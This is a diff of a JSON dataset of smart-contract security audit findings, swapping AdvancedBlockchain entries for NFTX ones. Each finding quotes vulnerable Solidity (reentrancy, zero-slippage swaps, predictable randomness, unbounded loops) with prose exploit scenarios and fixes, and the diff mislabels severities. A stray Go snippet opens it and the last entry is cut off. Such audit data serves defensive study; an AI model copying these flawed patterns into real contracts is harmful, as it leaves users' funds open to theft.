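// Sketch of the recommended length check in plugin/grpc/setup.go;
// c and g come from the parseStanza context in figure 15.1, and the
// Errf message text is our assumption.
hosts := plugin.Host(g.from).NormalizeExact()
if len(hosts) == 0 {
	return g, c.Errf("unable to normalize '%s'", g.from)
}
g.from = hosts[0] // only the first is used
```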
Vulnerability Categories The following tables describe the vulnerability categories, severity levels, and difficulty levels used in this document. Vulnerability Categories Category", "labels": [ "Trail of Bits", - "Severity: Medium", + "Severity: Informational", "Difficulty: Low" ] }, { + "title": "2. Missing validation of proxy admin indices ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/NFTX.pdf", + "body": "Multiple functions of the ProxyController contract take an index as an input. The index determines which proxy (managed by the controller) is being targeted. However, the index is never validated, which means that the function will be executed even if the index is out of bounds with respect to the number of proxies managed by the contract (in this case, five). function changeProxyAdmin(uint256 index, address newAdmin) public onlyOwner { } if (index == 0) { vaultFactoryProxy.changeAdmin(newAdmin); } else if (index == 1) { eligManagerProxy.changeAdmin(newAdmin); } else if (index == 2) { stakingProviderProxy.changeAdmin(newAdmin); } else if (index == 3) { stakingProxy.changeAdmin(newAdmin); } else if (index == 4) { feeDistribProxy.changeAdmin(newAdmin); } emit ProxyAdminChanged(index, newAdmin); Figure 2.1: The changeProxyAdmin function in ProxyController.sol:79-95 In the changeProxyAdmin function, a ProxyAdminChanged event is emitted even if the supplied index is out of bounds (figure 2.1). Other ProxyController functions return the zero address if the index is out of bounds. For example, getAdmin() should return the address of the targeted proxy's admin. If getAdmin() returns the zero address, the caller cannot know whether she supplied the wrong index or whether the targeted proxy simply has no admin. function getAdmin(uint256 index) public view returns (address admin) { if (index == 0) { return vaultFactoryProxy.admin(); } else if (index == 1) { return eligManagerProxy.admin(); } else if (index == 2) { return stakingProviderProxy.admin(); } else if (index == 3) { return stakingProxy.admin(); } else if (index == 4) { return feeDistribProxy.admin(); } } Figure 2.2: The getAdmin function in ProxyController.sol:38-50 Exploit Scenario A contract relying on the ProxyController contract calls one of the view functions, like getAdmin(), with the wrong index. The function is executed normally and implicitly returns zero, leading to unexpected behavior. Recommendations Short term, document this behavior so that clients are aware of it and are able to include safeguards to prevent unanticipated behavior. Long term, consider adding an index check to the affected functions so that they revert if they receive an out-of-bounds index.", "labels": [ "Trail of Bits", "Severity: Informational", "Difficulty: Low" ] }, { - "title": "1. Initialization functions can be front-run ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", - "body": "The CrosslayerPortal contracts have initializer functions that can be front-run, allowing an attacker to incorrectly initialize the contracts. Due to the use of the delegatecall proxy pattern, these contracts cannot be initialized with their own constructors, and they have initializer functions: function initialize() public initializer { __Ownable_init(); __Pausable_init(); __ReentrancyGuard_init(); } Figure 1.1: The initialize function in MsgSender:126-130 An attacker could front-run these functions and initialize the contracts with malicious values. 
This issue affects the following system contracts: contracts/core/BridgeAggregator contracts/core/InvestmentStrategyBase contracts/core/MosaicHolding contracts/core/MosaicVault contracts/core/MosaicVaultConfig contracts/core/functionCalls/MsgReceiverFactory contracts/core/functionCalls/MsgSender contracts/nfts/Summoner contracts/protocols/aave/AaveInvestmentStrategy contracts/protocols/balancer/BalancerV1Wrapper contracts/protocols/balancer/BalancerVaultV2Wrapper contracts/protocols/bancor/BancorWrapper contracts/protocols/compound/CompoundInvestmentStrategy contracts/protocols/curve/CurveWrapper contracts/protocols/gmx/GmxWrapper contracts/protocols/sushiswap/SushiswapLiquidityProvider contracts/protocols/synapse/ISynapseSwap contracts/protocols/synapse/SynapseWrapper contracts/protocols/uniswap/IUniswapV2Pair contracts/protocols/uniswap/UniswapV2Wrapper contracts/protocols/uniswap/UniswapWrapper Exploit Scenario Bob deploys the MsgSender contract. Eve front-runs the contract's initialization and sets her own address as the owner address. As a result, she can use the initialize function to update the contract's variables, modifying the system parameters. Recommendations Short term, to prevent front-running of the initializer functions, use hardhat-deploy to initialize the contracts or replace the functions with constructors. Alternatively, create a deployment script that will emit sufficient errors when an initialize call fails. Long term, carefully review the Solidity documentation, especially the Warnings section, as well as the pitfalls of using the delegatecall proxy pattern.", "labels": [ "Trail of Bits", - "Severity: Low", - "Difficulty: Low" + "Severity: Informational", + "Difficulty: High" ] }, { + "title": "3. Random token withdrawals can be gamed ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/NFTX.pdf", + "body": "The algorithm used to randomly select a token for withdrawal from a vault is deterministic and predictable. function getRandomTokenIdFromVault() internal virtual returns (uint256) { uint256 randomIndex = uint256( keccak256( abi.encodePacked( blockhash(block.number - 1), randNonce, block.coinbase, block.difficulty, block.timestamp ) ) ) % holdings.length(); ++randNonce; return holdings.at(randomIndex); } Figure 3.1: The getRandomTokenIdFromVault function in NFTXVaultUpgradable.sol:531-545 All the elements used to calculate randomIndex are known to the caller (figure 3.1). Therefore, a contract calling this function can predict the resulting token before choosing to execute the withdrawal. This finding is of high difficulty because NFTX's vault economics incentivizes users to deposit tokens of equal value. Moreover, the cost of deploying a custom exploit contract will likely outweigh the fee savings of choosing a token at random for withdrawal. Exploit Scenario Alice wishes to withdraw a specific token from a vault but wants to pay the lower random redemption fee rather than the higher target redemption fee. She deploys a contract that checks whether the randomly chosen token is her target and, if so, automatically executes the random withdrawal. Recommendations Short term, document the risks described in this finding so that clients are aware of them. Long term, consider removing all randomness from NFTX.", "labels": [ "Trail of Bits", "Severity: Informational", "Difficulty: High" ] }, { - "title": "2. 
Trades are vulnerable to sandwich attacks ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", - "body": "The swapToNative function does not allow users to specify the minAmountOut parameter of swapExactTokensForETH , which indicates the minimum amount of ETH that a user will receive from a trade. Instead, the value is hard-coded to zero, meaning that there is no guarantee that users will receive any ETH in exchange for their tokens. By using a bot to sandwich a user's trade, an attacker could increase the slippage incurred by the user and profit off of the spread at the user's expense. The minAmountOut parameter is meant to prevent the execution of trades through illiquid pools and to provide protection against sandwich attacks. The current implementation lacks protections against high slippage and may cause users to lose funds. This applies to the AVAX version, too. Composable Finance indicated that only the relayer will call this function, but the function lacks access controls to prevent users from calling it directly. Importantly, it is highly likely that if a relayer does not implement proper protections, all of its trades will suffer from high slippage, as they will represent pure-profit opportunities for sandwich bots. uint256 [] memory amounts = swapRouter.swapExactTokensForETH( _amount, 0 , path, _to, deadline ); Figure 2.1: Part of the SwapToNative function in MosaicNativeSwapperETH.sol:44-50 Exploit Scenario Bob, a relayer, makes a trade on behalf of a user. The minAmountOut value is set to zero, which means that the trade can be executed at any price. As a result, when Eve sandwiches the trade with a buy and sell order, Bob sells the tokens without purchasing any, effectively giving away tokens for free. Recommendations Short term, allow users (relayers) to input a slippage tolerance, and add access controls to the swapToNative function. Long term, consider the risks of integrating with other protocols such as Uniswap and implement mitigations for those risks.", "labels": [ "Trail of Bits", - "Severity: High", - "Difficulty: Medium" + "Severity: Medium", + "Difficulty: High" ] }, { + "title": "4. Duplicate receivers allowed by addReceiver() ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/NFTX.pdf", + "body": "The NFTXSimpleFeeDistributor contract is in charge of protocol fee distribution. To facilitate the fee distribution process, it allows the contract owner (the NFTX DAO) to manage a list of fee receivers. To add a new fee receiver to the contract, the owner calls the addReceiver() function. function addReceiver( uint256 _allocPoint, address _receiver, bool _isContract ) external override virtual onlyOwner { _addReceiver(_allocPoint, _receiver, _isContract); } Figure 4.1: The addReceiver() function in NFTXSimpleFeeDistributor This function in turn executes the internal logic that pushes a new receiver to the receiver list. function _addReceiver( uint256 _allocPoint, address _receiver, bool _isContract ) internal virtual { FeeReceiver memory _feeReceiver = FeeReceiver(_allocPoint, _receiver, _isContract); feeReceivers.push(_feeReceiver); allocTotal += _allocPoint; emit AddFeeReceiver(_receiver, _allocPoint); } Figure 4.2: The _addReceiver() function in NFTXSimpleFeeDistributor However, the function does not check whether the receiver is already in the list. Without this check, receivers can be accidentally added multiple times to the list, which would increase the amount of fees they receive. 
The issue is of high difficulty because the addReceiver() function is owner-protected and, as indicated by the NFTX team, the owner is the NFTX DAO. Because the DAO itself was out of scope for this review, we do not know what the process to become a receiver looks like. We assume that a DAO proposal has to be created and a certain quorum has to be met for it to be executed. Exploit Scenario A proposal is created to add a new receiver to the fee distributor contract. The receiver address was already added, but the DAO members are not aware of this. The proposal passes, and the receiver is added. The receiver gains more fees than he is entitled to. Recommendations Short term, document this behavior so that the NFTX DAO is aware of it and performs the adequate checks before adding a new receiver. Long term, consider adding a duplicate check to the _addReceiver() function.", "labels": [ "Trail of Bits", "Severity: Medium", "Difficulty: High" ] }, { - "title": "3. forwardCall creates a denial-of-service attack vector ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", - "body": "Low-level external calls can exhaust all available gas by returning an excessive amount of data, thereby causing the relayer to incur memory expansion costs. This can be used to cause an out-of-gas exception and is a denial-of-service (DoS) attack vector. Since arbitrary contracts can be called, Composable Finance should implement additional safeguards. If an out-of-gas exception occurs, the message will never be marked as forwarded ( forwarded[id] = true ). If the relayer repeatedly retries the transaction, assuming it will eventually be marked as forwarded, the queue of pending transactions will grow without bounds, with each unsuccessful message-forwarding attempt carrying a gas cost. The approveERC20TokenAndForwardCall function is also vulnerable to this DoS attack. (success, returnData) = _contract. call {value: msg.value }(_data); require (success, \"Failed to forward function call\" ); uint256 balance = IERC20(_feeToken).balanceOf( address ( this )); require ( balance >= _feeAmount, \"Not enough tokens for the fee\" ); forwarded[_id] = true ; Figure 3.1: Part of the forwardCall function in MsgReceiver:79-85 Exploit Scenario Eve deploys a contract that returns 10 million bytes of data. A call to that contract causes an out-of-gas exception. Since the transaction is not marked as forwarded, the relayer continues to propagate the transaction without success. This results in excessive resource consumption and a degraded quality of service. Recommendations Short term, require that the size of return data be fixed to 32 bytes. Long term, review the documentation on low-level Solidity calls and EVM edge cases. References Excessively Safe Call", "labels": [ "Trail of Bits", - "Severity: High", - "Difficulty: Medium" + "Severity: Informational", + "Difficulty: Low" ] }, { + "title": "5. OpenZeppelin vulnerability can break initialization ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/NFTX.pdf", + "body": "NFTX extensively uses OpenZeppelin v3.4.1. A bug was recently discovered in all OpenZeppelin versions prior to v4.4.1 that affects initializer functions invoked separately during contract creation: the bug causes the contract initialization modifier to fail to prevent reentrancy to the initializers (see CVE-2021-46320). Currently, no external calls to untrusted code are made during contract initialization. 
However, if the NFTX team were to add a new feature that requires such calls to be made, it would have to add the necessary safeguards to prevent reentrancy. Exploit Scenario An NFTX contract initialization function makes a call to an external contract that calls back to the initializer with different arguments. The faulty OpenZeppelin initializer modifier fails to prevent this reentrancy. Recommendations Short term, upgrade OpenZeppelin to v4.4.1 or newer. Long term, integrate a dependency checking tool like Dependabot into the NFTX CI process.", "labels": [ "Trail of Bits", "Severity: Informational", "Difficulty: Low" ] }, { - "title": "8. Lack of two-step process for contract ownership changes ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", - "body": "The owner of a contract in the Composable Finance ecosystem can be changed through a call to the transferOwnership function. This function internally calls the setOwner function, which immediately sets the contract's new owner. Making such a critical change in a single step is error-prone and can lead to irrevocable mistakes. /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions anymore. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby removing any functionality that is only available to the owner. */ function renounceOwnership () public virtual onlyOwner { _setOwner( address ( 0 )); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership ( address newOwner ) public virtual onlyOwner { require (newOwner != address ( 0 ), \"Ownable: new owner is the zero address\" ); _setOwner(newOwner); } function _setOwner ( address newOwner ) private { address oldOwner = _owner; _owner = newOwner; emit OwnershipTransferred(oldOwner, newOwner); } Figure 8.1: OpenZeppelin's OwnableUpgradeable contract Exploit Scenario Bob, a Composable Finance developer, invokes transferOwnership() to change the address of an existing contract's owner but accidentally enters the wrong address. As a result, he permanently loses access to the contract. Recommendations Short term, perform ownership transfers through a two-step process in which the owner proposes a new address and the transfer is completed once the new address has executed a call to accept the role. Long term, identify and document all possible actions that can be taken by privileged accounts and their associated risks. This will facilitate reviews of the codebase and prevent future mistakes.", "labels": [ "Trail of Bits", "Severity: Medium", "Difficulty: High" ] }, { + "title": "6. Potentially excessive gas fees imposed on users for protocol fee distribution ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/NFTX.pdf", + "body": "Whenever a user executes a minting, redeeming, or swapping operation on a vault, a fee is charged to the user and is sent to the NFTXSimpleFeeDistributor contract for distribution. function _chargeAndDistributeFees(address user, uint256 amount) internal virtual { // Do not charge fees if the zap contract is calling // Added in v1.0.3. Changed to mapping in v1.0.5. INFTXVaultFactory _vaultFactory = vaultFactory; if (_vaultFactory.excludedFromFees(msg.sender)) { return; } // Mint fees directly to the distributor and distribute. 
if (amount > 0) { address feeDistributor = _vaultFactory.feeDistributor(); // Changed to a _transfer() in v1.0.3. _transfer(user, feeDistributor, amount); INFTXFeeDistributor(feeDistributor).distribute(vaultId); } } Figure 6.1: The _chargeAndDistributeFees() function in NFTXVaultUpgradeable.sol After the fee is sent to the NFTXSimpleFeeDistributor contract, the distribute() function is then called to distribute all accrued fees. function distribute(uint256 vaultId) external override virtual nonReentrant { require(nftxVaultFactory != address(0)); address _vault = INFTXVaultFactory(nftxVaultFactory).vault(vaultId); uint256 tokenBalance = IERC20Upgradeable(_vault).balanceOf(address(this)); if (distributionPaused || allocTotal == 0) { IERC20Upgradeable(_vault).safeTransfer(treasury, tokenBalance); return; } uint256 length = feeReceivers.length; uint256 leftover; for (uint256 i; i < length; ++i) { FeeReceiver memory _feeReceiver = feeReceivers[i]; uint256 amountToSend = leftover + ((tokenBalance * _feeReceiver.allocPoint) / allocTotal); uint256 currentTokenBalance = IERC20Upgradeable(_vault).balanceOf(address(this)); amountToSend = amountToSend > currentTokenBalance ? currentTokenBalance : amountToSend; bool complete = _sendForReceiver(_feeReceiver, vaultId, _vault, amountToSend); if (!complete) { uint256 remaining = IERC20Upgradeable(_vault).allowance(address(this), _feeReceiver.receiver); IERC20Upgradeable(_vault).safeApprove(_feeReceiver.receiver, 0); leftover = remaining; } else { leftover = 0; } } if (leftover != 0) { uint256 currentTokenBalance = IERC20Upgradeable(_vault).balanceOf(address(this)); IERC20Upgradeable(_vault).safeTransfer(treasury, currentTokenBalance); } } Figure 6.2: The distribute() function in NFTXSimpleFeeDistributor.sol If the token balance of the contract is low enough (but not zero), the number of tokens distributed to each receiver (amountToSend) will be close to zero. Ultimately, this can disincentivize the use of the protocol, regardless of the number of tokens distributed. Users have to pay the gas fee for the fee distribution operation, the gas fees for the token operations (e.g., redeeming, minting, or swapping), and the protocol fees themselves. Exploit Scenario Alice redeems a token from a vault, pays the necessary protocol fee, sends it to the NFTXSimpleFeeDistributor contract, and calls the distribute() function. Because the balance of the distributor contract is very low (e.g., $0.50), Alice has to pay a substantial amount in gas to distribute a near-zero amount in fees between all fee receiver addresses. Recommendations Short term, add a requirement for a minimum balance that the NFTXSimpleFeeDistributor contract should have for the distribution operation to execute. Alternatively, implement a periodical distribution of fees (e.g., once a day or once every set number of blocks). Long term, consider redesigning the fee distribution mechanism to prevent the distribution of small fees. Also consider whether protocol users should pay for said distribution. See appendix D for guidance on redesigning this mechanism.", "labels": [ "Trail of Bits", "Severity: Medium", @@ -3202,29 +5880,39 @@ ] }, { - "title": "9. sendFunds is vulnerable to reentrancy by owners ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", - "body": "The sendFunds function is vulnerable to reentrancy and can be used by the owner of a token contract to drain the contract of its funds. 
Specifically, because fundsTransfered[user] is written to after a call to an external contract, the contract's owner could input his or her own address and reenter the sendFunds function to drain the contract's funds. An owner could send funds to him- or herself without using the reentrancy, but there is no reason to leave this vulnerability in the code. Additionally, the FundKeeper contract can send funds to any user by calling setAmountToSend and then sendFunds . It is unclear why amountToSend is not changed (set to zero) after a successful transfer. It would make more sense to call setAmountToSend after each transfer and to store users' balances in a mapping. function setAmountToSend ( uint256 amount ) external onlyOwner { amountToSend = amount; emit NewAmountToSend(amount); } function sendFunds ( address user ) external onlyOwner { require (!fundsTransfered[user], \"reward already sent\" ); require ( address ( this ).balance >= amountToSend, \"Contract balance low\" ); // solhint-disable-next-line avoid-low-level-calls ( bool sent , ) = user.call{value: amountToSend}( \"\" ); require (sent, \"Failed to send Polygon\" ); fundsTransfered[user] = true ; emit FundSent(amountToSend, user); } Figure 9.1: Part of the sendFunds function in FundKeeper.sol:23-38 Exploit Scenario Eve's smart contract is the owner of the FundKeeper contract. Eve's contract executes a transfer for which Eve should receive only 1 ETH. Instead, because the user address is a contract with a fallback function, Eve can reenter the sendFunds function and drain all ETH from the contract. Recommendations Short term, set fundsTransfered[user] to true prior to making external calls. Long term, store each user's balance in a mapping to ensure that users cannot make withdrawals that exceed their balances. Additionally, follow the checks-effects-interactions pattern.", "labels": [ "Trail of Bits", - "Severity: High", - "Difficulty: Low" + "Severity: Medium", + "Difficulty: High" ] }, { + "title": "7. Risk of denial of service due to unbounded loop ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/NFTX.pdf", + "body": "When protocol fees are distributed, the system loops through the list of beneficiaries (known internally as receivers) to send them the protocol fees they are entitled to. function distribute(uint256 vaultId) external override virtual nonReentrant { require(nftxVaultFactory != address(0)); address _vault = INFTXVaultFactory(nftxVaultFactory).vault(vaultId); uint256 tokenBalance = IERC20Upgradeable(_vault).balanceOf(address(this)); if (distributionPaused || allocTotal == 0) { IERC20Upgradeable(_vault).safeTransfer(treasury, tokenBalance); return; } uint256 length = feeReceivers.length; uint256 leftover; for (uint256 i; i < length; ++i) { FeeReceiver memory _feeReceiver = feeReceivers[i]; uint256 amountToSend = leftover + ((tokenBalance * _feeReceiver.allocPoint) / allocTotal); uint256 currentTokenBalance = IERC20Upgradeable(_vault).balanceOf(address(this)); amountToSend = amountToSend > currentTokenBalance ? 
currentTokenBalance : amountToSend; bool complete = _sendForReceiver(_feeReceiver, vaultId, _vault, amountToSend); if (!complete) { uint256 remaining = IERC20Upgradeable(_vault).allowance(address(this), _feeReceiver.receiver); IERC20Upgradeable(_vault).safeApprove(_feeReceiver.receiver, 0); leftover = remaining; } else { leftover = 0; } } if (leftover != 0) { uint256 currentTokenBalance = IERC20Upgradeable(_vault).balanceOf(address(this)); IERC20Upgradeable(_vault).safeTransfer(treasury, currentTokenBalance); } } Figure 7.1: The distribute() function in NFTXSimpleFeeDistributor.sol Because this loop is unbounded and the number of receivers can grow, the amount of gas consumed is also unbounded. function _sendForReceiver(FeeReceiver memory _receiver, uint256 _vaultId, address _vault, uint256 amountToSend) internal virtual returns (bool) { if (_receiver.isContract) { IERC20Upgradeable(_vault).safeIncreaseAllowance(_receiver.receiver, amountToSend); bytes memory payload = abi.encodeWithSelector(INFTXLPStaking.receiveRewards.selector, _vaultId, amountToSend); (bool success, ) = address(_receiver.receiver).call(payload); // If the allowance has not been spent, it means we can pass it forward to next. return success && IERC20Upgradeable(_vault).allowance(address(this), _receiver.receiver) == 0; } else { IERC20Upgradeable(_vault).safeTransfer(_receiver.receiver, amountToSend); return true; } } Figure 7.2: The _sendForReceiver() function in NFTXSimpleFeeDistributor.sol Additionally, if one of the receivers is a contract, code that significantly increases the gas cost of the fee distribution will execute (figure 7.2). It is important to note that fees are usually distributed within the context of user transactions (redeeming, minting, etc.), so the total cost of the distribution operation depends on the logic outside of the distribute() function. Exploit Scenario The NFTX team adds a new feature that allows NFTX token holders who stake their tokens to register as receivers and gain a portion of protocol fees; because of that, the number of receivers grows dramatically. Due to the large number of receivers, the distribute() function cannot execute because the cost of executing it has reached the block gas limit. As a result, users are unable to mint, redeem, or swap tokens. Recommendations Short term, examine the execution cost of the function to determine the safe bounds of the loop and, if possible, consider splitting the distribution operation into multiple calls. Long term, consider redesigning the fee distribution mechanism to avoid unbounded loops and prevent denials of service. See appendix D for guidance on redesigning this mechanism.", "labels": [ "Trail of Bits", "Severity: Medium", "Difficulty: High" ] }, { - "title": "20. MosaicVault and MosaicHolding owner has excessive privileges ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", - "body": "The owner of the MosaicVault and MosaicHolding contracts has too many privileges across the system. Compromise of the owner's private key would put the integrity of the underlying system at risk. 
The owner of the MosaicVault and MosaicHolding contracts can perform the following privileged operations in the context of the contracts: Rescuing funds if the system is compromised Managing withdrawals, transfers, and fee payments Pausing and unpausing the contracts Rebalancing liquidity across chains Investing in one or more investment strategies Claiming rewards from one or more investment strategies The ability to drain funds, manage liquidity, and claim rewards creates a single point of failure. It increases the likelihood that the contracts' owner will be targeted by an attacker and increases the incentives for the owner to act maliciously. Exploit Scenario Alice, the owner of MosaicVault and MosaicHolding , deploys the contracts. MosaicHolding eventually holds assets worth USD 20 million. Eve gains access to Alice's machine, upgrades the implementations, pauses MosaicHolding , and drains all funds from the contract. Recommendations Short term, clearly document the functions and implementations that the owner of the MosaicVault and MosaicHolding contracts can change. Additionally, split the privileges provided to the owner across multiple roles (e.g., a fund manager, fund rescuer, owner, etc.) to ensure that no one address has excessive control over the system. Long term, develop user documentation on all risks associated with the system, including those associated with privileged users and the existence of a single point of failure.", "labels": [ "Trail of Bits", "Severity: Informational", "Difficulty: Low" ] }, { + "title": "8. A malicious fee receiver can cause a denial of service ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/NFTX.pdf", + "body": "Whenever a user executes a minting, redeeming, or swapping operation on a vault, a fee is charged to the user and is sent to the NFTXSimpleFeeDistributor contract for distribution. The distribution function loops through all fee receivers and sends them the number of tokens they are entitled to (see figure 7.1). If the fee receiver is a contract, special logic is executed; instead of receiving the corresponding number of tokens, the receiver pulls all the tokens from the NFTXSimpleFeeDistributor contract. function _sendForReceiver(FeeReceiver memory _receiver, uint256 _vaultId, address _vault, uint256 amountToSend) internal virtual returns (bool) { if (_receiver.isContract) { IERC20Upgradeable(_vault).safeIncreaseAllowance(_receiver.receiver, amountToSend); bytes memory payload = abi.encodeWithSelector(INFTXLPStaking.receiveRewards.selector, _vaultId, amountToSend); (bool success, ) = address(_receiver.receiver).call(payload); // If the allowance has not been spent, it means we can pass it forward to next. return success && IERC20Upgradeable(_vault).allowance(address(this), _receiver.receiver) == 0; } else { IERC20Upgradeable(_vault).safeTransfer(_receiver.receiver, amountToSend); return true; } } Figure 8.1: The _sendForReceiver() function in NFTXSimpleFeeDistributor.sol In this case, because the receiver contract executes arbitrary logic and receives all of the gas, the receiver contract can spend all of it; as a result, only 1/64 of the original gas forwarded to the receiver contract would remain to continue executing the distribute() function (see EIP-150), which may not be enough to complete the execution, leading to a denial of service. The issue is of high difficulty because the addReceiver() function is owner-protected and, as indicated by the NFTX team, the owner is the NFTX DAO. 
Because the DAO itself was out of scope for this review, we do not know what the process to become a receiver looks like. We assume that a proposal is created and a certain quorum has to be met for it to be executed. Exploit Scenario Eve, a malicious receiver, sets up a smart contract that consumes all the gas forwarded to it when receiveRewards is called. As a result, the distribute() function runs out of gas, causing a denial of service on the vaults calling the function. Recommendations Short term, change the fee distribution mechanism so that only a token transfer is executed even if the receiver is a contract. Long term, consider redesigning the fee distribution mechanism to prevent malicious fee receivers from causing a denial of service on the protocol. See appendix D for guidance on redesigning this mechanism.", "labels": [ "Trail of Bits", "Severity: Medium", "Difficulty: High" ] }, { "title": "9. Vault managers can grief users ", "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/NFTX.pdf", "body": "The process of creating vaults in the NFTX protocol is trustless. This means that anyone can create a new vault and use any asset as the underlying vault NFT. The user calls the NFTXVaultFactoryUpgradeable contract to create a new vault. After deploying the new vault, the contract sets the user as the vault manager. Vault managers can disable certain vault features (figure 9.1) and change vault fees (figure 9.2). function setVaultFeatures( bool _enableMint, bool _enableRandomRedeem, bool _enableTargetRedeem, bool _enableRandomSwap, bool _enableTargetSwap ) public override virtual { onlyPrivileged(); enableMint = _enableMint; enableRandomRedeem = _enableRandomRedeem; enableTargetRedeem = _enableTargetRedeem; enableRandomSwap = _enableRandomSwap; enableTargetSwap = _enableTargetSwap; emit EnableMintUpdated(_enableMint); emit EnableRandomRedeemUpdated(_enableRandomRedeem); emit EnableTargetRedeemUpdated(_enableTargetRedeem); emit EnableRandomSwapUpdated(_enableRandomSwap); emit EnableTargetSwapUpdated(_enableTargetSwap); } Figure 9.1: The setVaultFeatures() function in NFTXVaultUpgradeable.sol function setFees( uint256 _mintFee, uint256 _randomRedeemFee, uint256 _targetRedeemFee, uint256 _randomSwapFee, uint256 _targetSwapFee ) public override virtual { onlyPrivileged(); vaultFactory.setVaultFees( vaultId, _mintFee, _randomRedeemFee, _targetRedeemFee, _randomSwapFee, _targetSwapFee ); } Figure 9.2: The setFees() function in NFTXVaultUpgradeable.sol The effects of these functions are instantaneous, which means users may not be able to react in time to these changes and exit the vaults. Additionally, disabling vault features with the setVaultFeatures() function can trap tokens in the contract. Ultimately, this risk is related to the trustless nature of vault creation, but the NFTX team can take certain measures to minimize the effects. One such measure, which is already in place, is vault verification, in which the vault manager calls the finalizeVault() function to pass her management rights to the zero address. This function then gives the verified status to the vault in the NFTX web application. Exploit Scenario Eve, a malicious manager, creates a new vault for a popular NFT collection. After the vault gains some user traction, she unilaterally changes the vault fees to the maximum (0.5 ether), which forces users to either pay the high fee or relinquish their tokens. 
Recommendations Short term, document the risks of interacting with vaults that have not been finalized (i.e., vaults that have managers). Long term, consider adding delays to manager-only functionality (e.g., a certain number of blocks) so that users have time to react and exit the vault.", + "labels": [ + "Trail of Bits", + "Severity: Medium", "Difficulty: Low" ] }, { - "title": "24. SushiswapLiquidityProvider deposits cannot be used to cover withdrawal requests ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", - "body": "Withdrawal requests that require the removal of liquidity from a Sushiswap liquidity pool will revert and cause a system failure. When a user requests a withdrawal of liquidity from the Mosaic system, MosaicVault (via the coverWithdrawRequest() function) queries MosaicHolding to see whether liquidity must be removed from an investment strategy to cover the withdrawal amount (figure 24.1). function _withdraw( address _accountTo, uint256 _amount, address _tokenIn, address _tokenOut, uint256 _amountOutMin, WithdrawData calldata _withdrawData, bytes calldata _data ) internal onlyWhitelistedToken(_tokenIn) validAddress(_tokenOut) nonReentrant onlyOwnerOrRelayer whenNotPaused returns (uint256 withdrawAmount) { IMosaicHolding mosaicHolding = IMosaicHolding(vaultConfig.getMosaicHolding()); require(hasBeenWithdrawn[_withdrawData.id] == false, \"ERR: ALREADY WITHDRAWN\"); if (_tokenOut == _tokenIn) { require( mosaicHolding.getTokenLiquidity(_tokenIn, _withdrawData.investmentStrategies) >= _amount, \"ERR: VAULT BAL\" ); } [...] mosaicHolding.coverWithdrawRequest( _withdrawData.investmentStrategies, _tokenIn, withdrawAmount ); [...] } Figure 24.1: The _withdraw function in MosaicVault:404-474 If MosaicHolding's balance of the token being withdrawn ( _tokenIn ) is not sufficient to cover the withdrawal, MosaicHolding will iterate through each investment strategy in the _investmentStrategy array and remove enough _tokenIn to cover it. To remove liquidity from an investment strategy, it calls withdrawInvestment() on that strategy (figure 24.2). function coverWithdrawRequest( address[] calldata _investmentStrategies, address _token, uint256 _amount ) external override { require(hasRole(MOSAIC_VAULT, msg.sender), \"ERR: PERMISSIONS A-V\"); uint256 balance = IERC20(_token).balanceOf(address(this)); if (balance >= _amount) return; uint256 requiredAmount = _amount - balance; uint8 index; while (requiredAmount > 0) { address strategy = _investmentStrategies[index]; IInvestmentStrategy investment = IInvestmentStrategy(strategy); uint256 investmentAmount = investment.investmentAmount(_token); uint256 amountToWithdraw = 0; if (investmentAmount >= requiredAmount) { amountToWithdraw = requiredAmount; requiredAmount = 0; } else { amountToWithdraw = investmentAmount; requiredAmount = requiredAmount - investmentAmount; } IInvestmentStrategy.Investment[] memory investments = new IInvestmentStrategy.Investment[](1); investments[0] = IInvestmentStrategy.Investment(_token, amountToWithdraw); IInvestmentStrategy(investment).withdrawInvestment(investments, \"\"); emit InvestmentWithdrawn(strategy, msg.sender); index++; } require(IERC20(_token).balanceOf(address(this)) >= _amount, \"ERR: VAULT BAL\"); } Figure 24.2: The coverWithdrawRequest function in MosaicHolding:217-251 This process works for an investment strategy in which the investments array function argument has a length of 1.
However, in the case of SushiswapLiquidityProvider, the withdrawInvestment() function expects the investments array to have a length of 2 (figure 24.3). function withdrawInvestment(Investment[] calldata _investments, bytes calldata _data) external override onlyInvestor nonReentrant { Investment memory investmentA = _investments[0]; Investment memory investmentB = _investments[1]; (uint256 deadline, uint256 liquidity) = abi.decode(_data, (uint256, uint256)); IERC20Upgradeable pair = IERC20Upgradeable(getPair(investmentA.token, investmentB.token)); pair.safeIncreaseAllowance(address(sushiSwapRouter), liquidity); (uint256 amountA, uint256 amountB) = sushiSwapRouter.removeLiquidity( investmentA.token, investmentB.token, liquidity, investmentA.amount, investmentB.amount, address(this), deadline ); IERC20Upgradeable(investmentA.token).safeTransfer(mosaicHolding, amountA); IERC20Upgradeable(investmentB.token).safeTransfer(mosaicHolding, amountB); } Figure 24.3: The withdrawInvestment function in SushiswapLiquidityProvider:90-113 Thus, any withdrawal request that requires the removal of liquidity from SushiswapLiquidityProvider will revert. Exploit Scenario Alice wishes to withdraw liquidity ( tokenA ) that she deposited into the Mosaic system. The MosaicHolding contract does not hold enough tokenA to cover the withdrawal and thus tries to withdraw tokenA from the SushiswapLiquidityProvider investment strategy. The request reverts, and Alice's withdrawal request fails, leaving her unable to access her funds. Recommendations Short term, avoid depositing user liquidity into the SushiswapLiquidityProvider 